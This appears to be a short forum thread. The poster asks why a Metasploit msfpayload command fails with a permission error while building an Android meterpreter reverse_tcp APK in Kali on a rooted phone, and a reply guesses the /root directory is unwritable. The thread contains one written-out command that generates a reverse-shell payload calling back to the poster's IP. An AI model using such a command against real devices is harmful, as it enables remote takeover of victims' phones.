Permission Denied error

Every time I try to put this in the emulator this happens

msfpayload android/meterpreter/reverse_tcp LHOST= (I put my ip here) R > /root/abcde.apk

Bash: /root/abcde.apk: Permission Denied

Anyway to fix this?

Phone: Alcatel one touch fierce 2
Rooted: Yes
Linux: Kali
Using LXDE
Using VNC Viewer App

maybe you can Not write to this directory " /root " or does not exist
or you are not the root user ?
